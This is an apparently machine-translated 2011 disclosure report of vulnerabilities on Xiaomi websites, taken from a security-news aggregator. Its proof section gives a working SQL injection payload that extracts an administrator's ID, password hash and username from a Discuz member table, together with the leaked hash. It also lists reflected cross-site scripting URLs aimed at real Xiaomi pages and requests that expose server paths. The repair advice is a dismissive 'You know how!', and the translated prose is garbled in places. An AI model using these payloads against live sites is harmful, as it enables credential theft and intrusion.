Xiaomi technology website vulnerability collection and repair programme-vulnerability warning-the black bar safety net

2011-12-30T00:00:00
ID MYHACK58:62201132746
Type myhack58
Reporter 佚名
Modified 2011-12-30T00:00:00

Description

Brief description: easy via Google Search, I found more of the size of the problem.

Detailed description: 1, The m chat the official forum of the secondary injection.

http://www.discuz.net/thread-2354532-1-1.html

Patch.

2, a cross-site scripting

http://mi.xiaomi.com/%E6%96%B9%E8%B6%85x%3Cscript%3Ealert%28/ss/%29%3C/script%3E/5

3, a cross-site scripting

http://mi.xiaomi.com/info.php?i=1&u=%CB%D5%B9%DA%BB%AA%2 7&e=3 5 4 1 1 1 8 4 1%40qq. com%2 7%3Cscript%3Ealert%2 8/s/%2 9;%3C/script%3E

4, a program error storm path

http://blog.xiaomi.com/wp-content/themes/xiaomi/

5, a program error storm path

http://hd.xiaomi.com/index.php?action=rank&date=2011-11-13%2 7

Vulnerability to prove: 1, x',subject=(/! select/ concat(uid,'|',password,'|',username) from pre_common_member where groupid=1 limit 0,1),comment='

4 2 7 5|fd9d2eba79764c080a3c2f9d5ab7e4a7|mcdull in sweeping

2, slightly

3, a slightly

4, the

Fatal error: Call to undefined function get_header() in /data/www/blog.xiaomi.com/wwwroot/wp-content/themes/xiaomi/index.php on line 7

5, the

Fatal error: Uncaught exception 'Exception' with message 'DateTime::__construct(): Failed to parse time string (2011-11-13\') at position 1 0 (\): Unexpected character' in /data/www/hd. xiaomi. com/action/rank. action. php:5 in 1 Stack trace: #0 /data/www/hd.xiaomi.com/action/rank.action.php(5 1): DateTime->__construct('2011-11-13\") #1 /data/www/hd.xiaomi.com/action/rank.action.php(4 0): rank->index() #2 /data/www/hd.xiaomi.com/action/rank.action.php(9 8): rank->init() #3 /data/www/hd.xiaomi.com/web/index.php(1 0 0): require('/data/www/hd. xi...') #4 {main} thrown in /data/www/hd.xiaomi.com/action/rank.action.php on line 5 1

Repair solutions:

You know how!

Author: Jannock